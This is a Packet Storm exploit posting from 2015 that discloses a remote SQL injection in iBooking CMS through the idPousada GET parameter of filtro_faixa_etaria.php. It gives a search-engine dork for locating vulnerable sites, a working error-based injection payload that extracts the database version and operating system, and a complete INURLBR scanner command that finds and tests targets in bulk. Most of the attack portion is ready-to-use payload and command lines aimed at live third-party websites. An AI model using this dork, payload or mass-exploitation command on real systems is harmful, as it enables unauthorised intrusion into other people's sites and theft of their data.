exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iBooking CMS SQL Injection

iBooking CMS SQL Injection
Posted Sep 18, 2015
Authored by Cleiton Pinheiro

iBooking CMS suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | f940a1514994a822f9b19f66067c704407e5484e1dded2db9cec7600be48e779

iBooking CMS SQL Injection

Change Mirror Download
*# VENTOR:   *          www.ibooking.com.br
*# Vulnerable versions:* ALL
*# File: * filtro_faixa_etaria.php
*# Parameter: * idPousada(GET)
*# DORK: * intext:"Desenvolvido por ibooking"
*# Reported:* 15/10/2015
#
---------------------------------------------------------------------------------
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# EMAIL: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
#
---------------------------------------------------------------------------------

*# Description*
The vulnerable request is made through a javascript function found within
/motor-de-reservas


# Javascript code responsible for vulnerable request

$.ajax({
type: "GET",
url: "filtro_faixa_etaria.php",
data: "qtde_quartos=1&idPousada=61",
success: function(xml){
$("#filtro_faixa_etaria").html(xml);
}
});


*# URL Vulnerable:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

*# POC:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)

*# Example:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

*# Return print:*
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png


*# Mass exploration using scanner INURLBR*
# Download: https://github.com/googleinurl/SCANNER-INURLBR

*# COMMAND*
*# SETTING DORK DE PESQUISA*
--dork 'YOU_DORK'
*# USE* --dork 'intext:"Desenvolvido por ibooking"'

*# SETTING OUTPUT FILE:*
*# USE* -s 'ibooking.txt'

*# SETTING STRING EXPLOIT GET:*
--exploit-get 'EXPLOIT_GET'
*# USE* --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

*# SETTING TYPE OF VALIDATION: *
*# USE* -t 3
The third type combine both first and second types: Then, of course, it
also establishes connection with the exploit through the get method.
The string get set in parameter --exploit-get It is injected directly in
the url:
Exemplo: --exploit-get '/index.php?id=1&file=conect.php'INJEÇÃO URL:
http://www.target.br/index.php?id=1&file=conect.php

*# SETTING STRING OF VALIDATION:*
Specify the string to be used as validation script:
Exemplo: -a {string}
Usando: -a '<title>hello world</title>'
If the specific value is found in the target, it is considered vulnerable.
- USE: -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal format in the exploit-get
string

*# COMMAND FULL:*
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s
'ibooking.txt' --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
-t 3 -a 'INURLBR_VULN'

*# MORE INFORMATION:*
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html



+--------------------------------------------------------------------------------------+
| | | G R 3 3 T S
| | |

+--------------------------------------------------------------------------------------+
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r,
arplhmd, 0x4h4x
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra,
Eclipse, shaxer
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão,
IceKiller, c00z
* Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close